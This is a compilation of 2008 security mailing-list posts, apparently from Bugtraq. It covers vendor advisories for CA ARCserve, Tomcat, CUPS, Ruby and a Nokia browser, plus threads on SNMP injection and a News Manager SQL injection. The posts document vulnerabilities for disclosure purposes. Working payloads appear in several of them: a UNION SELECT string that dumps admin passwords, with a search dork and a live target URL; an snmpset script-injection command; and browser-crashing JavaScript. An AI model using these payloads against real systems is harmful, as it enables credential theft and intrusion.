CA ARCserve Backup Multiple Vulnerabilities
Title: CA ARCserve Backup Multiple Vulnerabilities CA Advisory Date: 2008-10-09 Reported By: Haifei Li of Fortinet's FortiGuard Global Security Research Team Vulnerability Research Team of Assurent Secure Technologies, a TELUS Company Greg Linares of eEye Digital Security Impact: A remote attacker can cause a denial of service or possibly execute arbitrary code. Summary: CA ARCserve Backup contains multiple vulnerabilities that can allow a remote attacker to cause a denial of service or possibly execute arbitrary code. CA has issued patches to address the vulnerabilities. The first vulnerability, CVE-2008-4397, occurs due to insufficient validation of certain RPC call parameters by the message engine service. An attacker can exploit a directory traversal vulnerability to execute arbitrary commands. The second vulnerability, CVE-2008-4398, occurs due to insufficient validation by the tape engine service. An attacker can make a request that will crash the service. The third vulnerability, CVE-2008-4399, occurs due to insufficient validation by the database engine service. An attacker can make a request that will crash the service. The fourth vulnerability, CVE-2008-4400, occurs due to insufficient validation of authentication credentials. An attacker can make a request that will crash multiple services. Note that these issues only affect the base product. Mitigating Factors: None Severity: CA has given these vulnerabilities a High risk rating. Affected Products: CA ARCserve Backup r12.0 Windows CA ARCserve Backup r11.5 Windows* CA ARCserve Backup r11.1 Windows* CA Server Protection Suite r2 CA Business Protection Suite r2 CA Business Protection Suite for Microsoft Small Business Server Standard Edition r2 CA Business Protection Suite for Microsoft Small Business Server Premium Edition r2 *Formerly known as BrightStor ARCserve Backup. Non-Affected Products CA ARCserve Backup r12.0 Windows SP1 Affected Platforms: Windows Status and Recommendation: CA has issued the following updates for systems that have an affected base product. CA ARCserve Backup r12.0 Windows: Apply Service Pack 1 (RO01340) CA ARCserve Backup r11.5 Windows: RO02398 CA ARCserve Backup r11.1 Windows: RO02396 CA Protection Suites r2: RO02398 How to determine if you are affected: CA ARCserve Backup r12.0 Windows, CA ARCserve Backup r11.5 Windows: 1. Run the ARCserve Patch Management utility. From the Windows Start menu, it can be found under Programs-CA-ARCserve Patch Management-Patch Status. 2. The main patch status screen will indicate if the respective patch in the table below is currently applied. If the patch is not applied, the installation is vulnerable. ProductPatch CA ARCserve Backup r12.0 Windows RO01340 CA ARCserve Backup r11.5 Windows RO02398 For more information on the ARCserve Patch Management utility, read document TEC446265. Alternatively, use the file information below to determine if the product installation is vulnerable. CA ARCserve Backup r12.0 Windows, CA ARCserve Backup r11.5 Windows, CA ARCserve Backup r11.1 Windows: 1. Using Windows Explorer, locate the file asdbapi.dll. By default, the file is located in the C:\Program Files\CA\BrightStor ARCserve Backup directory. 2. Right click on the file and select Properties. 3. Select the General tab. 4. If the file timestamp is earlier than indicated in the table below, the installation is vulnerable. Product version: CA ARCserve Backup r11.1 Windows File Name: asdbapi.dll File Size: 856064 bytes Timestamp: 09/05/2008 10:35:19 Product version: CA ARCserve Backup r11.5 Windows* File Name: asdbapi.dll File Size: 1249354 bytes Timestamp: 09/05/2008 11:14:04 Product version: CA ARCserve Backup r12.0 Windows File Name: asdbapi.dll File Size: 992520 bytes Timestamp: 08/09/2008 4:51:58 *CA Protection Suites r2 includes CA ARCserve Backup 11.5 Workaround: None References (URLs may wrap): CA Support: http://support.ca.com/ Security Notice for CA ARCserve Backup https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=188143 Solution Document Reference APARs: RO01340, RO02398, RO02396 CA Security Response Blog posting: CA ARCserve Backup Multiple Vulnerabilities community.ca.com/blogs/casecurityresponseblog/archive/2008/10/9.aspx Reported By: CVE-2008-4397 - Haifei Li of Fortinet's FortiGuard Global Security Research Team http://www.fortiguardcenter.com/ CVE-2008-4398 - Vulnerability Research Team of Assurent Secure Technologies, a TELUS Company CVE-2008-4399 - Vulnerability Research Team of Assurent Secure Technologies, a TELUS Company http://www.assurent.com/index.php?id=17 CVE-2008-4400 - Greg Linares of eEye Digital Security http://www.eeye.com/ CVE References: CVE-2008-4397 - Message engine command injection http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4397 CVE-2008-4398 - Tape
Re: News Manager Remote SQL Injection Vulnerability
Discovered over a year ago. http://packetstormsecurity.org/0705-exploits/prenews-sql.txt 0bae5b1d6f9d99c6749403341807f0d8 Pre News Manager version 1.0 suffers from a remote SQL injection vulnerability. nbsp;Homepage: a href=http://www.cyber-security.org/; target=exthttp://www.cyber-security.org/./a On Thu, Oct 09, 2008 at 12:21:25PM +0300, Ghost hacker wrote: # News Manager Remote SQL Injection Vulnerability # # © Ghost Hacker , Real Hack Back :) # #[~] Author : Ghost Hacker # #[~] Home page : www.Real-h.com [Real Hack Back] # #[~] Contact Me : [EMAIL PROTECTED] # #[~] Bug : SQL Injection # #[~] From : Kingdom Saudi Arabia # #[~] Name Script : News Manager # #[~] Download : http://www.preprojects.com/news.asp # #[~] Dork : # # ©2006 PRE NEWS MANAGER | All Rights Reserved Or inurl:news_detail.php?nid= # #[~] Exploit : # # http:///news_detail.php?nid=-139+UNION+SELECT+1,2,concat(login,0x3a,password),3,5,6,7+from+admin-- #[~] live demo : # # http://www.preproject.com/news manager/news_detail.php?nid=-139+UNION+SELECT+1,2,concat(login,0x3a,password),3,5,6,7+from+admin-- #[~]Greets : # # Mr.SQL , Mr.SaFa7 , Mr-3sheq , aBo3tB , Night Mare , Root Hacker , Dmar al3noOoz , LJ TeaM # # Mr.MN7oS , Mr.Hope , EgYpTiaN x HaCkEr , PrO SpY , v4-team.com # # All Members Real Hack , All My Friends :) # # Viva Real Hack - Real-h.com .. # _ Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
[SECURITY] CVE-2008-3271 - Apache Tomcat information disclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 CVE-2008-3271: Tomcat information disclosure vulnerability Severity: Low Vendor: The Apache Software Foundation Versions Affected: Tomcat 4.1.0 to 4.1.31 Tomcat 5.5.0 Tomcat 6.0.x is not affected The unsupported Tomcat 3.x, 4.0.x and 5.0.x versions may be also affected Description: Bug 25835 (https://issues.apache.org/bugzilla/show_bug.cgi?id=25835) can, in very rare circumstances, permit a user from a non-permitted IP address to gain access to a context protected with a valve that extends RemoteFilterValve. Mitigation: Upgrade to: 4.1.32 or later 5.5.1 or later 6.0.0 or later Example: This has only been reproduced using a debugger to force a particular processing sequence across two threads. 1. Set a breakpoint right after the place where a value is to be entered in the instance variable of regexp (search:org.apache.regexp.CharacterIterator). 2. Send a request from the IP address* which is not permitted. (stopped at the breakpoint) *About the IP address which is not permitted. The character strings length of the IP address which is set in RemoteAddrValve must be same. 3. Send a request from the IP address which was set in RemoteAddrValve. (stopped at the breakpoint) In this way, the instance variable is to be overwritten here. 4. Resume the thread which is processing the step 2 above. 5. The request from the not permitted IP address will succeed. Credit: This issue was discovered by Kenichi Tsukamoto (Development Dept. II, Application Management Middleware Div., FUJITSU LIMITED) and reported to the Tomcat security team via JPCERT. References: http://tomcat.apache.org/security.html Mark Thomas -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkjuibsACgkQb7IeiTPGAkO33wCgiBY0nBdTaXBC8oPoHqMWH4mt OtgAmQHjgnxg0vKKSp43vez8XaBIZpOj =9Z/F -END PGP SIGNATURE-
ZDI-08-067: Apple CUPS 1.3.7 (HP-GL/2 filter) Remote Code Execution Vulnerability
ZDI-08-067: Apple CUPS 1.3.7 (HP-GL/2 filter) Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-08-067 October 9, 2008 -- CVE ID: CVE-2008-3641 -- Affected Vendors: Apple -- Affected Products: Apple OS X -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6325. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple CUPS. Authentication is not required to exploit this vulnerability. The specific flaw exists in the Hewlett-Packard Graphics Language filter. Inadequate bounds checking on the pen width and pen color opcodes result in an arbitrary memory overwrite allowing for the execution of arbitrary code as the hgltops process uid. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT3216 -- Disclosure Timeline: 2008-08-19 - Vulnerability reported to vendor 2008-10-09 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * regenrecht -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED]
[USN-651-1] Ruby vulnerabilities
=== Ubuntu Security Notice USN-651-1 October 10, 2008 ruby1.8 vulnerabilities CVE-2008-2376, CVE-2008-3443, CVE-2008-3655, CVE-2008-3656, CVE-2008-3657, CVE-2008-3790, CVE-2008-3905 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.04 Ubuntu 7.10 Ubuntu 8.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libruby1.8 1.8.4-1ubuntu1.6 ruby1.8 1.8.4-1ubuntu1.6 Ubuntu 7.04: libruby1.8 1.8.5-4ubuntu2.3 ruby1.8 1.8.5-4ubuntu2.3 Ubuntu 7.10: libruby1.8 1.8.6.36-1ubuntu3.3 ruby1.8 1.8.6.36-1ubuntu3.3 Ubuntu 8.04 LTS: libruby1.8 1.8.6.111-2ubuntu1.2 ruby1.8 1.8.6.111-2ubuntu1.2 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Akira Tagoh discovered a vulnerability in Ruby which lead to an integer overflow. If a user or automated system were tricked into running a malicious script, an attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-2376) Laurent Gaffie discovered that Ruby did not properly check for memory allocation failures. If a user or automated system were tricked into running a malicious script, an attacker could cause a denial of service. (CVE-2008-3443) Keita Yamaguchi discovered several safe level vulnerabilities in Ruby. An attacker could use this to bypass intended access restrictions. (CVE-2008-3655) Keita Yamaguchi discovered that WEBrick in Ruby did not properly validate paths ending with .. A remote attacker could send a crafted HTTP request and cause a denial of service. (CVE-2008-3656) Keita Yamaguchi discovered that the dl module in Ruby did not check the taintness of inputs. An attacker could exploit this vulnerability to bypass safe levels and execute dangerous functions. (CVE-2008-3657) Luka Treiber and Mitja Kolsek discovered that REXML in Ruby did not always use expansion limits when processing XML documents. If a user or automated system were tricked into open a crafted XML file, an attacker could cause a denial of service via CPU consumption. (CVE-2008-3790) Jan Lieskovsky discovered several flaws in the name resolver of Ruby. A remote attacker could exploit this to spoof DNS entries, which could lead to misdirected traffic. This is a different vulnerability from CVE-2008-1447. (CVE-2008-3790) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.4-1ubuntu1.6.diff.gz Size/MD5:46252 5c3015046d04d53042ef782ea12875c3 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.4-1ubuntu1.6.dsc Size/MD5: 1029 7074495b271591010fba16b96cb69b5d http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.4.orig.tar.gz Size/MD5: 4308915 2994203e0815ea978965de34287c5ea2 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/irb1.8_1.8.4-1ubuntu1.6_all.deb Size/MD5: 207750 f70d912e1a23e973a996ea7bb3091927 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/rdoc1.8_1.8.4-1ubuntu1.6_all.deb Size/MD5: 272628 2d260b7726e4df4fdc1926aa9ca6acaa http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/ri1.8_1.8.4-1ubuntu1.6_all.deb Size/MD5: 758550 e67337bbfe714de20254282f9a76aa6f http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/ruby1.8-elisp_1.8.4-1ubuntu1.6_all.deb Size/MD5: 182528 60c62fcfcfcf948e9a226b549f549b86 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/ruby1.8-examples_1.8.4-1ubuntu1.6_all.deb Size/MD5: 214768 a5cea4984ad695e6c6847373caa1ac6f amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8-dbg_1.8.4-1ubuntu1.6_amd64.deb Size/MD5: 1041044 9af0f93f2be69fa1f55427d3adda8849 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8_1.8.4-1ubuntu1.6_amd64.deb Size/MD5: 1508216 06599ab080d810f1a7ef6982d5e1ec1f http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8-dev_1.8.4-1ubuntu1.6_amd64.deb Size/MD5: 718534 a4b3d91889d504cd846b40967357a4ad http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.4-1ubuntu1.6_amd64.deb Size/MD5: 189758 e685df2818366115694e31bf212895e0 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libdbm-ruby1.8_1.8.4-1ubuntu1.6_amd64.deb Size/MD5: 170200 0e63f0dfb6145a51dade02a85849a7ac
Re: PR08-24: Proxim Tsunami MP.11 2411 vulnerable to SNMP Injection
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi 3APA3A, That's a good question, and here is my answer from the draft version of an upcoming paper I'm working on: Gaining SNMP write access to a device is already a compromise on its own and usually considered a potential high risk security issue. Therefore, one could argue that there is no point in launching a SNMP injection attack when we can already change system settings via the SNMP write community string. You might be wondering: why bother injecting a HTML/JavaScript payload on the web console through SNMP when I can change system parameters via SNMP alone? In reality however, when a valid SNMP write community is identified, we find that many OIDs cannot be changed due to read-only settings enforced on that particular object. Instead, we are restricted to only being able to change a limited number of OIDs. What OIDs can be modified with a SNMP write community string depends on two factors: - - Specific vendor implementation of SNMP write permissions - - SNMP RFCs By being able to change a limited number of OIDs via a SNMP write community string, the attacker might be able to DoS the device by crippling its configuration settings or even deface some banners. However, a serious attacker is ultimately interested in gaining full access (admin/root) to the target device. Since identifying a valid SNMP write community string might not be enough to accomplish such goal, it makes sense to resort to SNMP injection. Hope that helps. Regards, ap. Vladimir '3APA3A' Dubrovin wrote: Dear ProCheckUp Research, What can you achieve with script injection you can not achieve with SNMP write access? --Thursday, October 9, 2008, 5:02:44 PM, you wrote to bugtraq@securityfocus.com: PR $ snmpset -v1 -c public 192.168.1.100 sysName.0 s 'scriptalert(1)/script' -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFI7xPVoR/Hvsj3i8sRAlIUAJ9ZWNliZ18Akibq0R7XuHSDMiPCsQCdGZi8 Hrr0hjnddyfu+8pUqKeJcXk= =UIm8 -END PGP SIGNATURE-
Re[2]: PR08-24: Proxim Tsunami MP.11 2411 vulnerable to SNMP Injection
Dear [EMAIL PROTECTED], Why do you think you can't do it with SNMP? An examples are settings DNS server option via DHCP (or DNS domain name for proxy server autodiscovery protocol) or even configuring a VPN tunnel for all traffic. I'm not sure about Tsunami, for Orinoco these settings are read/write: http://support.ipmonitor.com/mibs/ORINOCO-MIB/oids.aspx see e.g. oriDHCPServerPrimaryDNSIPAddress --Friday, October 10, 2008, 1:24:27 AM, you wrote to [EMAIL PROTECTED]: lercg -Vladimir '3APA3A' Dubrovin [EMAIL PROTECTED] wrote: - What can you achieve with script injection you can not achieve with SNMP write access? lercg I don't know what you can actually achieve, but in addition to whatever you lercg can do to/with the box you have SNMP write access for, it gives you a shot lercg at the admin's machine. And maybe even a shot at everything that the lercg admin's machine can talk to. lercg Regards, lercg Lee --Thursday, October 9, 2008, 5:02:44 PM, you wrote to bugtraq@securityfocus.com: PR $ snmpset -v1 -c public 192.168.1.100 sysName.0 s 'scriptalert(1)/script' -- ~/ZARAZA http://securityvulns.com/ -- ~/ZARAZA http://securityvulns.com/ Если даже вы получите какое-нибудь письмо, вы все равно не сумеете его прочитать. (Твен)
[LC-2008-04] Nokia Browser Array Sort Denial Of Service Vulnerability
Security Research Advisory
Vulnerability name: Nokia Browser Array Sort Denial Of Service Vulnerability
Advisory number: LC-2008-04
Advisory URL: http://www.ikkisoft.com
1) Affected Software
* Nokia Mini Map Browser (S60WebKit = 21772)
The tested device has the following User-Agent:
Mozilla/5.0 (SymbianOS/9.2;U;Series60/3.1 NokiaE90-1/210.34.75
Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML)
Safari/413
Note: Although the Nokia Web Browser is built upon a port of the
open source WebKit used by Apple for its browser, the iPhone is not
affected (at least the iPhone firmware version 2.0.2(5C1))
2) Severity
Severity: Low
Local/Remote: Remote
3) Summary
The Web Browser for S60 (formally called Nokia Mini Map Browser) is a web
browser for the S60 mobile phone platform developed by Nokia.
It is built upon S60WebKit, a port of the open source WebKit project to the S60
platform. According to several sources, the S60 software on Symbian OS is the
world's most popular software for smartphones.
This version of the Nokia Mini Map Browser does not properly validate JavaScript
input embedded in visited HTML pages. An aggressor can easily trigger Denial of
Service attacks.
References:
http://opensource.nokia.com/projects/S60browser/
http://en.wikipedia.org/wiki/Web_Browser_for_S60
4) Vulnerability Details
The Nokia Mini Map Browser is prone to a vulnerability that may result in the
application silent crash. Arbitrary code execution is probably not possible.
The problem arises in the JavaScript core of the S60WebKit, invoking the sort()
function on a recursive array.
A similar behavior was observed some years ago in several browsers due to
the common code base (BID-12331, BID-11762, BID-11760, BID-11759,
BID-11752).
5) Exploit
Embed in an HTML page the following JavaScript:
script
foo = new Array();
while(true) {foo = new Array(foo).sort();}
/script
6) Fix Information
n/a
7) Time Table
08/09/2008 - Vendor notified.
15/09/2008 - Vendor response.
??/??/ - Vendor patch release.
10/10/2008 - Public disclosure.
8) Credits
Discovered by Luca Carettoni - luca.carettoni[at]ikkisoft[dot]com
9) Legal Notices
The information in the advisory is believed to be accurate at the time of
publishing based on currently available information.
This information is provided as-is, as a free service to the community.
There are no warranties with regard to this information.
The author does not accept any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
Permission is hereby granted for the redistribution of this alert, provided
that the content is not altered in any way, except reformatting, and that due
credit is given.
This vulnerability has been disclosed in accordance with the RFP
Full-Disclosure Policy v2.0, available at:
http://www.wiretrip.net/rfp/policy.html
